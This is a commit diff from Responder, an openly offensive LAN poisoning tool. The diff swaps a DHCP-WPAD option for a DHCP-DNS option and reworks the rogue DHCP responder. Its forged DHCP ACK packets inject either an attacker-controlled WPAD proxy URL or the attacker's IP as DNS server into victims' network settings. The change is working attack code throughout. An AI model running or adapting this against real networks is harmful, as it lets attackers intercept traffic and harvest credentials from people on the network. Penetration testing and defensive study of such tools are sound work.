Added DHCP DNS vs DHCP WPAD

2025-07-06 04:51:23 -07:00 · 2021-12-12 17:55:58 -03:00 · 2021-12-12 17:55:58 -03:00 · 76f6c88df3
commit 76f6c88df3
parent 9dc779869b
3 changed files with 17 additions and 15 deletions
--- a/Responder.py
+++ b/Responder.py
@ -34,7 +34,7 @@ parser.add_option('-e', "--externalip",    action="store",      help="Poison all
 parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
 parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
 parser.add_option('-d', '--DHCP',          action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False)
-parser.add_option('-W', '--DHCP-WPAD',     action="store_true", help="This option will inject a WPAD server in the DHCP response, otherwise it will be done via DNS. Default: False", dest="DHCP_WPAD", default=False)
+parser.add_option('-D', '--DHCP-DNS',     action="store_true", help="This option will inject a DNS server in the DHCP response, otherwise a WPAD server will be added. Default: False", dest="DHCP_DNS", default=False)
 parser.add_option('-f','--fingerprint',    action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
 parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
@ -347,7 +347,7 @@ def main():
 		if settings.Config.DHCP_On_Off:
 			from poisoners.DHCP import DHCP
-			DHCP(settings.Config.DHCP_WPAD)
+			DHCP(settings.Config.DHCP_DNS)
 		while True:
 			time.sleep(1)
--- a/poisoners/DHCP.py
+++ b/poisoners/DHCP.py
@ -83,7 +83,7 @@ Interface           = settings.Config.Interface
 Responder_IP        = RespondWithIP()
 ROUTERIP            = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
 NETMASK             = "255.255.255.0"
-DNSIP               = RespondWithIP()
+DNSIP               = "0.0.0.0"
 DNSIP2              = "0.0.0.0"
 DNSNAME             = "lan"
 WPADSRV             = "http://"+Responder_IP+"/wpad.dat"
@ -205,17 +205,19 @@ class DHCPACK(Packet):
            ("Padding",           "\x00"),
    ])
-    def calculate(self, DHCP_WPAD):
+    def calculate(self, DHCP_DNS):
        self.fields["Op54Str"]  = socket.inet_aton(ROUTERIP).decode('latin-1')
        self.fields["Op1Str"]   = socket.inet_aton(NETMASK).decode('latin-1')
        self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP).decode('latin-1')
        self.fields["Op6Str"]   = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
        self.fields["Op15Str"]  = DNSNAME
-        if DHCP_WPAD:
+        if DHCP_DNS:
-             self.fields["Op252"]    = "\xfc"
+               self.fields["Op6Str"]   = socket.inet_aton(RespondWithIP()).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
-             self.fields["Op252Str"] = WPADSRV
+        else:
-             self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
+               self.fields["Op252"]    = "\xfc"
-             self.fields["Op6Str"]   = socket.inet_aton('0.0.0.0').decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
+               self.fields["Op252Str"] = WPADSRV
               self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
        self.fields["Op51Str"]  = StructWithLenPython2or3('>L', random.randrange(10, 20))
        self.fields["Op15Len"]  = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
@ -241,7 +243,7 @@ def FindIP(data):
    IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
    return ''.join(IP[0:4]).encode('latin-1')
-def ParseDHCPCode(data, ClientIP,DHCP_WPAD):
+def ParseDHCPCode(data, ClientIP,DHCP_DNS):
    global DHCPClient
    global ROUTERIP
    PTid        = data[4:8]
@ -267,7 +269,7 @@ def ParseDHCPCode(data, ClientIP,DHCP_WPAD):
            if RespondToThisIP(IPConv):
                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
-                Packet.calculate(DHCP_WPAD)
+                Packet.calculate(DHCP_DNS)
                Buffer = UDP(Data = Packet)
                Buffer.calculate()
                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
@ -286,7 +288,7 @@ def ParseDHCPCode(data, ClientIP,DHCP_WPAD):
            if RespondToThisIP(IPConv):
                IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
-                Packet.calculate(DHCP_WPAD)
+                Packet.calculate(DHCP_DNS)
                Buffer = UDP(Data = Packet)
                Buffer.calculate()
                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
@ -313,7 +315,7 @@ def SendDHCP(packet,Host):
 	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
 	s.sendto(NetworkSendBufferPython2or3(packet), Host)
-def DHCP(DHCP_WPAD):
+def DHCP(DHCP_DNS):
    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
    s.bind((Interface, 0x0800))
    SendDiscover()
@ -323,6 +325,6 @@ def DHCP(DHCP_WPAD):
                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
                if SrcPort == 67 or DstPort == 67:
                    ClientIP = socket.inet_ntoa(data[0][26:30])
-                    ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_WPAD)
+                    ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_DNS)
                    if ret:
                        print(text("[*] [DHCP] %s" % ret))
--- a/settings.py
+++ b/settings.py
@ -132,7 +132,7 @@ class Settings:
 		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
 		self.CommandLine        = str(sys.argv)
 		self.Bind_To            = utils.FindLocalIP(self.Interface, self.OURIP)
-		self.DHCP_WPAD          = options.DHCP_WPAD
+		self.DHCP_DNS          = options.DHCP_DNS
 		if self.Interface == "ALL":
                	self.Bind_To_ALL  = True